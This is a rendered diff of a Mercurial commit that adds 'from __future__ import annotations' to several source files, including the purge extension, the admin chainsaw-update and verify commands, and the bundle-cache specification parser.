##// END OF EJS Templates
typing: add `from __future__ import annotations` to remaining source files...
Matt Harbison -
r52757:1c5810ce default
parent child Browse files
Show More
@@ -1,39 +1,42
1 1 # Copyright (C) 2006 - Marco Barisione <marco@barisione.org>
2 2 #
3 3 # This is a small extension for Mercurial (https://mercurial-scm.org/)
4 4 # that removes files not known to mercurial
5 5 #
6 6 # This program was inspired by the "cvspurge" script contained in CVS
7 7 # utilities (http://www.red-bean.com/cvsutils/).
8 8 #
9 9 # For help on the usage of "hg purge" use:
10 10 # hg help purge
11 11 #
12 12 # This program is free software; you can redistribute it and/or modify
13 13 # it under the terms of the GNU General Public License as published by
14 14 # the Free Software Foundation; either version 2 of the License, or
15 15 # (at your option) any later version.
16 16 #
17 17 # This program is distributed in the hope that it will be useful,
18 18 # but WITHOUT ANY WARRANTY; without even the implied warranty of
19 19 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
20 20 # GNU General Public License for more details.
21 21 #
22 22 # You should have received a copy of the GNU General Public License
23 23 # along with this program; if not, see <http://www.gnu.org/licenses/>.
24 24
25 25 '''command to delete untracked files from the working directory (DEPRECATED)
26 26
27 27 The functionality of this extension has been included in core Mercurial since
28 28 version 5.7. Please use :hg:`purge ...` instead. :hg:`purge --confirm` is now
29 29 the default, unless the extension is enabled for backward compatibility.
30 30 '''
31 31
32 32 # This empty extension looks pointless, but core mercurial checks if it's loaded
33 33 # to implement the slightly different behavior documented above.
34 34
35 35 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
36 36 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
37 37 # be specifying the version(s) of Mercurial they are tested with, or
38 38 # leave the attribute unspecified.
39
40 from __future__ import annotations
41
39 42 testedwith = b'ships-with-hg-core'
@@ -1,12 +1,15
1 from __future__ import annotations
2
3
1 4 def run():
2 5 from . import demandimport
3 6
4 7 with demandimport.tracing.log('hg script'):
5 8 demandimport.enable()
6 9 from . import dispatch
7 10
8 11 dispatch.run()
9 12
10 13
11 14 if __name__ == '__main__':
12 15 run()
@@ -1,226 +1,228
1 1 # chainsaw.py
2 2 #
3 3 # Copyright 2022 Georges Racinet <georges.racinet@octobus.net>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7 """chainsaw is a collection of single-minded and dangerous tools. (EXPERIMENTAL)
8 8
9 9 "Don't use a chainsaw to cut your food!"
10 10
11 11 The chainsaw is a collection of commands that are so much geared towards a
12 12 specific use case in a specific context or environment that they are totally
13 13 inappropriate and **really dangerous** in other contexts.
14 14
15 15 The help text of each command explicitly summarizes its context of application
16 16 and the wanted end result.
17 17
18 18 It is recommended to run these commands with the ``HGPLAIN`` environment
19 19 variable (see :hg:`help scripting`).
20 20 """
21 21
22 from __future__ import annotations
23
22 24 import shutil
23 25
24 26 from ..i18n import _
25 27 from .. import (
26 28 cmdutil,
27 29 commands,
28 30 error,
29 31 localrepo,
30 32 registrar,
31 33 )
32 34 from ..utils import (
33 35 urlutil,
34 36 )
35 37
36 38 cmdtable = {}
37 39 command = registrar.command(cmdtable)
38 40
39 41
40 42 @command(
41 43 b'admin::chainsaw-update',
42 44 [
43 45 (
44 46 b'',
45 47 b'purge-unknown',
46 48 True,
47 49 _(
48 50 b'Remove unversioned files before update. Disabling this can '
49 51 b'in some cases interfere with the update.'
50 52 b'See also :hg:`purge`.'
51 53 ),
52 54 ),
53 55 (
54 56 b'',
55 57 b'purge-ignored',
56 58 True,
57 59 _(
58 60 b'Remove ignored files before update. Disable this for '
59 61 b'instance to reuse previous compiler object files. '
60 62 b'See also :hg:`purge`.'
61 63 ),
62 64 ),
63 65 (
64 66 b'',
65 67 b'rev',
66 68 b'',
67 69 _(b'revision to update to'),
68 70 ),
69 71 (
70 72 b'',
71 73 b'source',
72 74 b'',
73 75 _(b'repository to clone from'),
74 76 ),
75 77 (
76 78 b'',
77 79 b'dest',
78 80 b'',
79 81 _(b'repository to update to REV (possibly cloning)'),
80 82 ),
81 83 (
82 84 b'',
83 85 b'initial-clone-minimal',
84 86 False,
85 87 _(
86 88 b'Pull only the prescribed revision upon initial cloning. '
87 89 b'This has the side effect of ignoring clone-bundles, '
88 90 b'which if often slower on the client side and stressful '
89 91 b'to the server than applying available clone bundles.'
90 92 ),
91 93 ),
92 94 ],
93 95 _(
94 96 b'hg admin::chainsaw-update [OPTION] --rev REV --source SOURCE --dest DEST'
95 97 ),
96 98 helpbasic=True,
97 99 norepo=True,
98 100 )
99 101 def update(ui, **opts):
100 102 """pull and update to a given revision, no matter what, (EXPERIMENTAL)
101 103
102 104 Context of application: *some* Continuous Integration (CI) systems,
103 105 packaging or deployment tools.
104 106
105 107 Wanted end result: local repository at the given REPO_PATH, having the
106 108 latest changes to the given revision and with a clean working directory
107 109 updated at the given revision.
108 110
109 111 chainsaw-update pulls from one source, then updates the working directory
110 112 to the given revision, overcoming anything that would stand in the way.
111 113
112 114 By default, it will:
113 115
114 116 - clone if the local repo does not exist yet, **removing any directory
115 117 at the given path** that would not be a Mercurial repository.
116 118 The initial clone is full by default, so that clonebundles can be
117 119 applied. Use the --initial-clone-minimal flag to avoid this.
118 120 - break locks if needed, leading to possible corruption if there
119 121 is a concurrent write access.
120 122 - perform recovery actions if needed
121 123 - revert any local modification.
122 124 - purge unknown and ignored files.
123 125 - go as far as to reclone if everything else failed (not implemented yet).
124 126
125 127 DO NOT use it for anything else than performing a series
126 128 of unattended updates, with full exclusive repository access each time
127 129 and without any other local work than running build scripts.
128 130 In case the local repository is a share (see :hg:`help share`), exclusive
129 131 write access to the share source is also mandatory.
130 132
131 133 It is recommended to run these commands with the ``HGPLAIN`` environment
132 134 variable (see :hg:`scripting`).
133 135
134 136 Motivation: in Continuous Integration and Delivery systems (CI/CD), the
135 137 occasional remnant or bogus lock are common sources of waste of time (both
136 138 working time and calendar time). CI/CD scripts tend to grow with counter-
137 139 measures, often done in urgency. Also, whilst it is neat to keep
138 140 repositories from one job to the next (especially with large
139 141 repositories), an exceptional recloning is better than missing a release
140 142 deadline.
141 143 """
142 144 rev = opts['rev']
143 145 source = opts['source']
144 146 repo_path = opts['dest']
145 147 if not rev:
146 148 raise error.InputError(_(b'specify a target revision with --rev'))
147 149 if not source:
148 150 raise error.InputError(_(b'specify a pull path with --source'))
149 151 if not repo_path:
150 152 raise error.InputError(_(b'specify a repo path with --dest'))
151 153 repo_path = urlutil.urllocalpath(repo_path)
152 154
153 155 try:
154 156 repo = localrepo.instance(ui, repo_path, create=False)
155 157 repo_created = False
156 158 ui.status(_(b'loaded repository at "%s"\n' % repo_path))
157 159 except error.RepoError:
158 160 try:
159 161 shutil.rmtree(repo_path)
160 162 except FileNotFoundError:
161 163 ui.status(_(b'no such directory: "%s"\n' % repo_path))
162 164 else:
163 165 ui.status(
164 166 _(
165 167 b'removed non-repository file or directory '
166 168 b'at "%s"' % repo_path
167 169 )
168 170 )
169 171
170 172 ui.status(_(b'creating repository at "%s"\n' % repo_path))
171 173 repo = localrepo.instance(ui, repo_path, create=True)
172 174 repo_created = True
173 175
174 176 if repo.svfs.tryunlink(b'lock'):
175 177 ui.status(_(b'had to break store lock\n'))
176 178 if repo.vfs.tryunlink(b'wlock'):
177 179 ui.status(_(b'had to break working copy lock\n'))
178 180 # If another process relock after the breacking above, the next locking
179 181 # will have to wait.
180 182 with repo.wlock(), repo.lock():
181 183 ui.status(_(b'recovering after interrupted transaction, if any\n'))
182 184 repo.recover()
183 185
184 186 ui.status(_(b'pulling from %s\n') % source)
185 187 if repo_created and not opts.get('initial_clone_minimal'):
186 188 pull_revs = []
187 189 else:
188 190 pull_revs = [rev]
189 191 overrides = {(b'ui', b'quiet'): True}
190 192 with repo.ui.configoverride(overrides, b'chainsaw-update'):
191 193 pull = cmdutil.findcmd(b'pull', commands.table)[1][0]
192 194 ret = pull(
193 195 repo.ui,
194 196 repo,
195 197 source,
196 198 rev=pull_revs,
197 199 remote_hidden=False,
198 200 )
199 201 if ret:
200 202 return ret
201 203
202 204 purge = cmdutil.findcmd(b'purge', commands.table)[1][0]
203 205 ret = purge(
204 206 ui,
205 207 repo,
206 208 dirs=True,
207 209 all=opts.get('purge_ignored'),
208 210 files=opts.get('purge_unknown'),
209 211 confirm=False,
210 212 )
211 213 if ret:
212 214 return ret
213 215
214 216 ui.status(_(b'updating to revision \'%s\'\n') % rev)
215 217 update = cmdutil.findcmd(b'update', commands.table)[1][0]
216 218 ret = update(ui, repo, rev=rev, clean=True)
217 219 if ret:
218 220 return ret
219 221
220 222 ui.status(
221 223 _(
222 224 b'chainsaw-update to revision \'%s\' '
223 225 b'for repository at \'%s\' done\n'
224 226 )
225 227 % (rev, repo.root)
226 228 )
@@ -1,340 +1,342
1 1 # admin/verify.py - better repository integrity checking for Mercurial
2 2 #
3 3 # Copyright 2023 Octobus <contact@octobus.net>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 from __future__ import annotations
9
8 10 import collections
9 11 import copy
10 12 import functools
11 13
12 14 from ..i18n import _
13 15 from .. import error, pycompat, registrar, requirements
14 16 from ..utils import stringutil
15 17
16 18
17 19 verify_table = {}
18 20 verify_alias_table = {}
19 21 check = registrar.verify_check(verify_table, verify_alias_table)
20 22
21 23
22 24 # Use this to declare options/aliases in the middle of the hierarchy.
23 25 # Checks like these are not run themselves and cannot have a body.
24 26 # For an example, see the `revlogs` check.
25 27 def noop_func(*args, **kwargs):
26 28 return
27 29
28 30
29 31 @check(b"working-copy.dirstate", alias=b"dirstate")
30 32 def check_dirstate(ui, repo, **options):
31 33 ui.status(_(b"checking dirstate\n"))
32 34
33 35 parent1, parent2 = repo.dirstate.parents()
34 36 m1 = repo[parent1].manifest()
35 37 m2 = repo[parent2].manifest()
36 38 errors = 0
37 39
38 40 is_narrow = requirements.NARROW_REQUIREMENT in repo.requirements
39 41 narrow_matcher = repo.narrowmatch() if is_narrow else None
40 42 for err in repo.dirstate.verify(m1, m2, parent1, narrow_matcher):
41 43 ui.warn(err)
42 44 errors += 1
43 45
44 46 return errors
45 47
46 48
47 49 # Tree of all checks and their associated function
48 50 pyramid = {}
49 51
50 52
51 53 def build_pyramid(table, full_pyramid):
52 54 """Create a pyramid of checks of the registered checks.
53 55 It is a name-based hierarchy that can be arbitrarily nested."""
54 56 for entry, func in sorted(table.items(), key=lambda x: x[0], reverse=True):
55 57 cursor = full_pyramid
56 58 levels = entry.split(b".")
57 59 for level in levels[:-1]:
58 60 current_node = cursor.setdefault(level, {})
59 61 cursor = current_node
60 62 if cursor.get(levels[-1]) is None:
61 63 cursor[levels[-1]] = (entry, func)
62 64 elif func is not noop_func:
63 65 m = b"intermediate checks need to use `verify.noop_func`"
64 66 raise error.ProgrammingError(m)
65 67
66 68
67 69 def find_checks(name, table=None, alias_table=None, full_pyramid=None):
68 70 """Find all checks for a given name and returns a dict of
69 71 (qualified_check_name, check_function)
70 72
71 73 # Examples
72 74
73 75 Using a full qualified name:
74 76 "working-copy.dirstate" -> {
75 77 "working-copy.dirstate": CF,
76 78 }
77 79
78 80 Using a *prefix* of a qualified name:
79 81 "store.revlogs" -> {
80 82 "store.revlogs.changelog": CF,
81 83 "store.revlogs.manifestlog": CF,
82 84 "store.revlogs.filelog": CF,
83 85 }
84 86
85 87 Using a defined alias:
86 88 "revlogs" -> {
87 89 "store.revlogs.changelog": CF,
88 90 "store.revlogs.manifestlog": CF,
89 91 "store.revlogs.filelog": CF,
90 92 }
91 93
92 94 Using something that is none of the above will be an error.
93 95 """
94 96 if table is None:
95 97 table = verify_table
96 98 if alias_table is None:
97 99 alias_table = verify_alias_table
98 100
99 101 if name == b"full":
100 102 return table
101 103 checks = {}
102 104
103 105 # is it a full name?
104 106 check = table.get(name)
105 107
106 108 if check is None:
107 109 # is it an alias?
108 110 qualified_name = alias_table.get(name)
109 111 if qualified_name is not None:
110 112 name = qualified_name
111 113 check = table.get(name)
112 114 else:
113 115 split = name.split(b".", 1)
114 116 if len(split) == 2:
115 117 # split[0] can be an alias
116 118 qualified_name = alias_table.get(split[0])
117 119 if qualified_name is not None:
118 120 name = b"%s.%s" % (qualified_name, split[1])
119 121 check = table.get(name)
120 122 else:
121 123 qualified_name = name
122 124
123 125 # Maybe it's a subtree in the check hierarchy that does not
124 126 # have an explicit alias.
125 127 levels = name.split(b".")
126 128 if full_pyramid is not None:
127 129 if not full_pyramid:
128 130 build_pyramid(table, full_pyramid)
129 131
130 132 pyramid.clear()
131 133 pyramid.update(full_pyramid.items())
132 134 else:
133 135 build_pyramid(table, pyramid)
134 136
135 137 subtree = pyramid
136 138 # Find subtree
137 139 for level in levels:
138 140 subtree = subtree.get(level)
139 141 if subtree is None:
140 142 hint = error.getsimilar(list(alias_table) + list(table), name)
141 143 hint = error.similarity_hint(hint)
142 144
143 145 raise error.InputError(_(b"unknown check %s" % name), hint=hint)
144 146
145 147 # Get all checks in that subtree
146 148 if isinstance(subtree, dict):
147 149 stack = list(subtree.items())
148 150 while stack:
149 151 current_name, entry = stack.pop()
150 152 if isinstance(entry, dict):
151 153 stack.extend(entry.items())
152 154 else:
153 155 # (qualified_name, func)
154 156 checks[entry[0]] = entry[1]
155 157 else:
156 158 checks[name] = check
157 159
158 160 return checks
159 161
160 162
161 163 def pass_options(
162 164 ui,
163 165 checks,
164 166 options,
165 167 table=None,
166 168 alias_table=None,
167 169 full_pyramid=None,
168 170 ):
169 171 """Given a dict of checks (fully qualified name to function), and a list
170 172 of options as given by the user, pass each option down to the right check
171 173 function."""
172 174 ui.debug(b"passing options to check functions\n")
173 175 to_modify = collections.defaultdict(dict)
174 176
175 177 if not checks:
176 178 raise error.Error(_(b"`checks` required"))
177 179
178 180 for option in sorted(options):
179 181 split = option.split(b":")
180 182 hint = _(
181 183 b"syntax is 'check:option=value', "
182 184 b"eg. revlogs.changelog:copies=yes"
183 185 )
184 186 option_error = error.InputError(
185 187 _(b"invalid option '%s'") % option, hint=hint
186 188 )
187 189 if len(split) != 2:
188 190 raise option_error
189 191
190 192 check_name, option_value = split
191 193 if not option_value:
192 194 raise option_error
193 195
194 196 split = option_value.split(b"=")
195 197 if len(split) != 2:
196 198 raise option_error
197 199
198 200 option_name, value = split
199 201 if not value:
200 202 raise option_error
201 203
202 204 path = b"%s:%s" % (check_name, option_name)
203 205
204 206 matching_checks = find_checks(
205 207 check_name,
206 208 table=table,
207 209 alias_table=alias_table,
208 210 full_pyramid=full_pyramid,
209 211 )
210 212 for name in matching_checks:
211 213 check = checks.get(name)
212 214 if check is None:
213 215 msg = _(b"specified option '%s' for unselected check '%s'\n")
214 216 raise error.InputError(msg % (name, option_name))
215 217
216 218 assert hasattr(check, "func") # help Pytype
217 219
218 220 if not hasattr(check.func, "options"):
219 221 raise error.InputError(
220 222 _(b"check '%s' has no option '%s'") % (name, option_name)
221 223 )
222 224
223 225 try:
224 226 matching_option = next(
225 227 (o for o in check.func.options if o[0] == option_name)
226 228 )
227 229 except StopIteration:
228 230 raise error.InputError(
229 231 _(b"check '%s' has no option '%s'") % (name, option_name)
230 232 )
231 233
232 234 # transform the argument from cli string to the expected Python type
233 235 _name, typ, _docstring = matching_option
234 236
235 237 as_typed = None
236 238 if isinstance(typ, bool):
237 239 as_bool = stringutil.parsebool(value)
238 240 if as_bool is None:
239 241 raise error.InputError(
240 242 _(b"'%s' is not a boolean ('%s')") % (path, value)
241 243 )
242 244 as_typed = as_bool
243 245 elif isinstance(typ, list):
244 246 as_list = stringutil.parselist(value)
245 247 if as_list is None:
246 248 raise error.InputError(
247 249 _(b"'%s' is not a list ('%s')") % (path, value)
248 250 )
249 251 as_typed = as_list
250 252 else:
251 253 raise error.ProgrammingError(b"unsupported type %s", type(typ))
252 254
253 255 if option_name in to_modify[name]:
254 256 raise error.InputError(
255 257 _(b"duplicated option '%s' for '%s'") % (option_name, name)
256 258 )
257 259 else:
258 260 assert as_typed is not None
259 261 to_modify[name][option_name] = as_typed
260 262
261 263 # Manage case where a check is set but without command line options
262 264 # it will later be set with default check options values
263 265 for name, f in checks.items():
264 266 if name not in to_modify:
265 267 to_modify[name] = {}
266 268
267 269 # Merge default options with command line options
268 270 for check_name, cmd_options in to_modify.items():
269 271 check = checks.get(check_name)
270 272 func = checks[check_name]
271 273 merged_options = {}
272 274 # help Pytype
273 275 assert check is not None
274 276 assert check.func is not None
275 277 assert hasattr(check.func, "options")
276 278
277 279 if check.func.options:
278 280 # copy the default value in case it's mutable (list, etc.)
279 281 merged_options = {
280 282 o[0]: copy.deepcopy(o[1]) for o in check.func.options
281 283 }
282 284 if cmd_options:
283 285 for k, v in cmd_options.items():
284 286 merged_options[k] = v
285 287 options = pycompat.strkwargs(merged_options)
286 288 checks[check_name] = functools.partial(func, **options)
287 289 ui.debug(b"merged options for '%s': '%r'\n" % (check_name, options))
288 290
289 291 return checks
290 292
291 293
292 294 def get_checks(
293 295 repo,
294 296 ui,
295 297 names=None,
296 298 options=None,
297 299 table=None,
298 300 alias_table=None,
299 301 full_pyramid=None,
300 302 ):
301 303 """Given a list of function names and optionally a list of
302 304 options, return matched checks with merged options (command line options
303 305 values take precedence on default ones)
304 306
305 307 It runs find checks, then resolve options and returns a dict of matched
306 308 functions with resolved options.
307 309 """
308 310 funcs = {}
309 311
310 312 if names is None:
311 313 names = []
312 314
313 315 if options is None:
314 316 options = []
315 317
316 318 # find checks
317 319 for name in names:
318 320 matched = find_checks(
319 321 name,
320 322 table=table,
321 323 alias_table=alias_table,
322 324 full_pyramid=full_pyramid,
323 325 )
324 326 matched_names = b", ".join(matched)
325 327 ui.debug(b"found checks '%s' for name '%s'\n" % (matched_names, name))
326 328 funcs.update(matched)
327 329
328 330 funcs = {n: functools.partial(f, ui, repo) for n, f in funcs.items()}
329 331
330 332 # resolve options
331 333 checks = pass_options(
332 334 ui,
333 335 funcs,
334 336 options,
335 337 table=table,
336 338 alias_table=alias_table,
337 339 full_pyramid=full_pyramid,
338 340 )
339 341
340 342 return checks
@@ -1,50 +1,52
1 1 # admin_commands.py - command processing for admin* commands
2 2 #
3 3 # Copyright 2022 Mercurial Developers
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 from __future__ import annotations
9
8 10 from .i18n import _
9 11 from .admin import chainsaw, verify
10 12 from . import error, registrar, transaction
11 13
12 14
13 15 table = {}
14 16 table.update(chainsaw.command._table)
15 17 command = registrar.command(table)
16 18
17 19
18 20 @command(
19 21 b'admin::verify',
20 22 [
21 23 (b'c', b'check', [], _(b'add a check'), _(b'CHECK')),
22 24 (b'o', b'option', [], _(b'pass an option to a check'), _(b'OPTION')),
23 25 ],
24 26 helpcategory=command.CATEGORY_MAINTENANCE,
25 27 )
26 28 def admin_verify(ui, repo, **opts):
27 29 """verify the integrity of the repository
28 30
29 31 Alternative UI to `hg verify` with a lot more control over the
30 32 verification process and better error reporting.
31 33 """
32 34
33 35 if not repo.url().startswith(b'file:'):
34 36 raise error.Abort(_(b"cannot verify bundle or remote repos"))
35 37
36 38 if transaction.has_abandoned_transaction(repo):
37 39 ui.warn(_(b"abandoned transaction found - run hg recover\n"))
38 40
39 41 checks = opts.get("check", [])
40 42 options = opts.get("option", [])
41 43
42 44 funcs = verify.get_checks(repo, ui, names=checks, options=options)
43 45
44 46 ui.status(_(b"running %d checks\n") % len(funcs))
45 47 # Done in two times so the execution is separated from the resolving step
46 48 for name, func in sorted(funcs.items(), key=lambda x: x[0]):
47 49 ui.status(_(b"running %s\n") % name)
48 50 errors = func()
49 51 if errors:
50 52 ui.warn(_(b"found %d errors\n") % errors)
@@ -1,568 +1,570
1 1 # bundlecaches.py - utility to deal with pre-computed bundle for servers
2 2 #
3 3 # This software may be used and distributed according to the terms of the
4 4 # GNU General Public License version 2 or any later version.
5 5
6 from __future__ import annotations
7
6 8 import collections
7 9 import typing
8 10
9 11 from typing import (
10 12 Dict,
11 13 Union,
12 14 cast,
13 15 )
14 16
15 17 from .i18n import _
16 18
17 19 from .thirdparty import attr
18 20
19 21 # Force pytype to use the non-vendored package
20 22 if typing.TYPE_CHECKING:
21 23 # noinspection PyPackageRequirements
22 24 import attr
23 25
24 26 from . import (
25 27 error,
26 28 requirements as requirementsmod,
27 29 sslutil,
28 30 util,
29 31 )
30 32 from .utils import stringutil
31 33
32 34 urlreq = util.urlreq
33 35
34 36 BUNDLE_CACHE_DIR = b'bundle-cache'
35 37 CB_MANIFEST_FILE = b'clonebundles.manifest'
36 38 CLONEBUNDLESCHEME = b"peer-bundle-cache://"
37 39
38 40
39 41 def get_manifest(repo) -> bytes:
40 42 """get the bundle manifest to be served to a client from a server"""
41 43 raw_text = repo.vfs.tryread(CB_MANIFEST_FILE)
42 44 entries = [e.split(b' ', 1) for e in raw_text.splitlines()]
43 45
44 46 new_lines = []
45 47 for e in entries:
46 48 url = alter_bundle_url(repo, e[0])
47 49 if len(e) == 1:
48 50 line = url + b'\n'
49 51 else:
50 52 line = b"%s %s\n" % (url, e[1])
51 53 new_lines.append(line)
52 54 return b''.join(new_lines)
53 55
54 56
55 57 def alter_bundle_url(repo, url: bytes) -> bytes:
56 58 """a function that exist to help extension and hosting to alter the url
57 59
58 60 This will typically be used to inject authentication information in the url
59 61 of cached bundles."""
60 62 return url
61 63
62 64
63 65 SUPPORTED_CLONEBUNDLE_SCHEMES = [
64 66 b"http://",
65 67 b"https://",
66 68 b"largefile://",
67 69 CLONEBUNDLESCHEME,
68 70 ]
69 71
70 72
71 73 @attr.s
72 74 class bundlespec:
73 75 compression = attr.ib()
74 76 wirecompression = attr.ib()
75 77 version = attr.ib()
76 78 wireversion = attr.ib()
77 79 # parameters explicitly overwritten by the config or the specification
78 80 _explicit_params = attr.ib()
79 81 # default parameter for the version
80 82 #
81 83 # Keeping it separated is useful to check what was actually overwritten.
82 84 _default_opts = attr.ib()
83 85
84 86 @property
85 87 def params(self):
86 88 return collections.ChainMap(self._explicit_params, self._default_opts)
87 89
88 90 @property
89 91 def contentopts(self):
90 92 # kept for Backward Compatibility concerns.
91 93 return self.params
92 94
93 95 def set_param(self, key, value, overwrite=True):
94 96 """Set a bundle parameter value.
95 97
96 98 Will only overwrite if overwrite is true"""
97 99 if overwrite or key not in self._explicit_params:
98 100 self._explicit_params[key] = value
99 101
100 102 def as_spec(self):
101 103 parts = [b"%s-%s" % (self.compression, self.version)]
102 104 for param in sorted(self._explicit_params.items()):
103 105 parts.append(b'%s=%s' % param)
104 106 return b';'.join(parts)
105 107
106 108
107 109 # Maps bundle version human names to changegroup versions.
108 110 _bundlespeccgversions = {
109 111 b'v1': b'01',
110 112 b'v2': b'02',
111 113 b'v3': b'03',
112 114 b'packed1': b's1',
113 115 b'bundle2': b'02', # legacy
114 116 }
115 117
116 118 # Maps bundle version with content opts to choose which part to bundle
117 119 _bundlespeccontentopts: Dict[bytes, Dict[bytes, Union[bool, bytes]]] = {
118 120 b'v1': {
119 121 b'changegroup': True,
120 122 b'cg.version': b'01',
121 123 b'obsolescence': False,
122 124 b'phases': False,
123 125 b'tagsfnodescache': False,
124 126 b'revbranchcache': False,
125 127 },
126 128 b'v2': {
127 129 b'changegroup': True,
128 130 b'cg.version': b'02',
129 131 b'obsolescence': False,
130 132 b'phases': False,
131 133 b'tagsfnodescache': True,
132 134 b'revbranchcache': True,
133 135 },
134 136 b'v3': {
135 137 b'changegroup': True,
136 138 b'cg.version': b'03',
137 139 b'obsolescence': False,
138 140 b'phases': True,
139 141 b'tagsfnodescache': True,
140 142 b'revbranchcache': True,
141 143 },
142 144 b'streamv2': {
143 145 b'changegroup': False,
144 146 b'cg.version': b'02',
145 147 b'obsolescence': False,
146 148 b'phases': False,
147 149 b"stream": b"v2",
148 150 b'tagsfnodescache': False,
149 151 b'revbranchcache': False,
150 152 },
151 153 b'streamv3-exp': {
152 154 b'changegroup': False,
153 155 b'cg.version': b'03',
154 156 b'obsolescence': False,
155 157 b'phases': False,
156 158 b"stream": b"v3-exp",
157 159 b'tagsfnodescache': False,
158 160 b'revbranchcache': False,
159 161 },
160 162 b'packed1': {
161 163 b'cg.version': b's1',
162 164 },
163 165 b'bundle2': { # legacy
164 166 b'cg.version': b'02',
165 167 },
166 168 }
167 169 _bundlespeccontentopts[b'bundle2'] = _bundlespeccontentopts[b'v2']
168 170
169 171 # Compression engines allowed in version 1. THIS SHOULD NEVER CHANGE.
170 172 _bundlespecv1compengines = {b'gzip', b'bzip2', b'none'}
171 173
172 174
173 175 def param_bool(key, value):
174 176 """make a boolean out of a parameter value"""
175 177 b = stringutil.parsebool(value)
176 178 if b is None:
177 179 msg = _(b"parameter %s should be a boolean ('%s')")
178 180 msg %= (key, value)
179 181 raise error.InvalidBundleSpecification(msg)
180 182 return b
181 183
182 184
183 185 # mapping of known parameter name need their value processed
184 186 bundle_spec_param_processing = {
185 187 b"obsolescence": param_bool,
186 188 b"obsolescence-mandatory": param_bool,
187 189 b"phases": param_bool,
188 190 b"changegroup": param_bool,
189 191 b"tagsfnodescache": param_bool,
190 192 b"revbranchcache": param_bool,
191 193 }
192 194
193 195
194 196 def _parseparams(s):
195 197 """parse bundlespec parameter section
196 198
197 199 input: "comp-version;params" string
198 200
199 201 return: (spec; {param_key: param_value})
200 202 """
201 203 if b';' not in s:
202 204 return s, {}
203 205
204 206 params = {}
205 207 version, paramstr = s.split(b';', 1)
206 208
207 209 err = _(b'invalid bundle specification: missing "=" in parameter: %s')
208 210 for p in paramstr.split(b';'):
209 211 if b'=' not in p:
210 212 msg = err % p
211 213 raise error.InvalidBundleSpecification(msg)
212 214
213 215 key, value = p.split(b'=', 1)
214 216 key = urlreq.unquote(key)
215 217 value = urlreq.unquote(value)
216 218 process = bundle_spec_param_processing.get(key)
217 219 if process is not None:
218 220 value = process(key, value)
219 221 params[key] = value
220 222
221 223 return version, params
222 224
223 225
224 226 def parsebundlespec(repo, spec, strict=True):
225 227 """Parse a bundle string specification into parts.
226 228
227 229 Bundle specifications denote a well-defined bundle/exchange format.
228 230 The content of a given specification should not change over time in
229 231 order to ensure that bundles produced by a newer version of Mercurial are
230 232 readable from an older version.
231 233
232 234 The string currently has the form:
233 235
234 236 <compression>-<type>[;<parameter0>[;<parameter1>]]
235 237
236 238 Where <compression> is one of the supported compression formats
237 239 and <type> is (currently) a version string. A ";" can follow the type and
238 240 all text afterwards is interpreted as URI encoded, ";" delimited key=value
239 241 pairs.
240 242
241 243 If ``strict`` is True (the default) <compression> is required. Otherwise,
242 244 it is optional.
243 245
244 246 Returns a bundlespec object of (compression, version, parameters).
245 247 Compression will be ``None`` if not in strict mode and a compression isn't
246 248 defined.
247 249
248 250 An ``InvalidBundleSpecification`` is raised when the specification is
249 251 not syntactically well formed.
250 252
251 253 An ``UnsupportedBundleSpecification`` is raised when the compression or
252 254 bundle type/version is not recognized.
253 255
254 256 Note: this function will likely eventually return a more complex data
255 257 structure, including bundle2 part information.
256 258 """
257 259 if strict and b'-' not in spec:
258 260 raise error.InvalidBundleSpecification(
259 261 _(
260 262 b'invalid bundle specification; '
261 263 b'must be prefixed with compression: %s'
262 264 )
263 265 % spec
264 266 )
265 267
266 268 pre_args = spec.split(b';', 1)[0]
267 269 if b'-' in pre_args:
268 270 compression, version = spec.split(b'-', 1)
269 271
270 272 if compression not in util.compengines.supportedbundlenames:
271 273 raise error.UnsupportedBundleSpecification(
272 274 _(b'%s compression is not supported') % compression
273 275 )
274 276
275 277 version, params = _parseparams(version)
276 278
277 279 if version not in _bundlespeccontentopts:
278 280 raise error.UnsupportedBundleSpecification(
279 281 _(b'%s is not a recognized bundle version') % version
280 282 )
281 283 else:
282 284 # Value could be just the compression or just the version, in which
283 285 # case some defaults are assumed (but only when not in strict mode).
284 286 assert not strict
285 287
286 288 spec, params = _parseparams(spec)
287 289
288 290 if spec in util.compengines.supportedbundlenames:
289 291 compression = spec
290 292 version = b'v1'
291 293 # Generaldelta repos require v2.
292 294 if requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements:
293 295 version = b'v2'
294 296 elif requirementsmod.REVLOGV2_REQUIREMENT in repo.requirements:
295 297 version = b'v2'
296 298 # Modern compression engines require v2.
297 299 if compression not in _bundlespecv1compengines:
298 300 version = b'v2'
299 301 elif spec in _bundlespeccontentopts:
300 302 if spec == b'packed1':
301 303 compression = b'none'
302 304 else:
303 305 compression = b'bzip2'
304 306 version = spec
305 307 else:
306 308 raise error.UnsupportedBundleSpecification(
307 309 _(b'%s is not a recognized bundle specification') % spec
308 310 )
309 311
310 312 # Bundle version 1 only supports a known set of compression engines.
311 313 if version == b'v1' and compression not in _bundlespecv1compengines:
312 314 raise error.UnsupportedBundleSpecification(
313 315 _(b'compression engine %s is not supported on v1 bundles')
314 316 % compression
315 317 )
316 318
317 319 # The specification for packed1 can optionally declare the data formats
318 320 # required to apply it. If we see this metadata, compare against what the
319 321 # repo supports and error if the bundle isn't compatible.
320 322 if version == b'packed1' and b'requirements' in params:
321 323 requirements = set(cast(bytes, params[b'requirements']).split(b','))
322 324 missingreqs = requirements - requirementsmod.STREAM_FIXED_REQUIREMENTS
323 325 if missingreqs:
324 326 raise error.UnsupportedBundleSpecification(
325 327 _(b'missing support for repository features: %s')
326 328 % b', '.join(sorted(missingreqs))
327 329 )
328 330
329 331 # Compute contentopts based on the version
330 332 if b"stream" in params:
331 333 # This case is fishy as this mostly derails the version selection
332 334 # mechanism. `stream` bundles are quite specific and used differently
333 335 # as "normal" bundles.
334 336 #
335 337 # (we should probably define a cleaner way to do this and raise a
336 338 # warning when the old way is encountered)
337 339 if params[b"stream"] == b"v2":
338 340 version = b"streamv2"
339 341 if params[b"stream"] == b"v3-exp":
340 342 version = b"streamv3-exp"
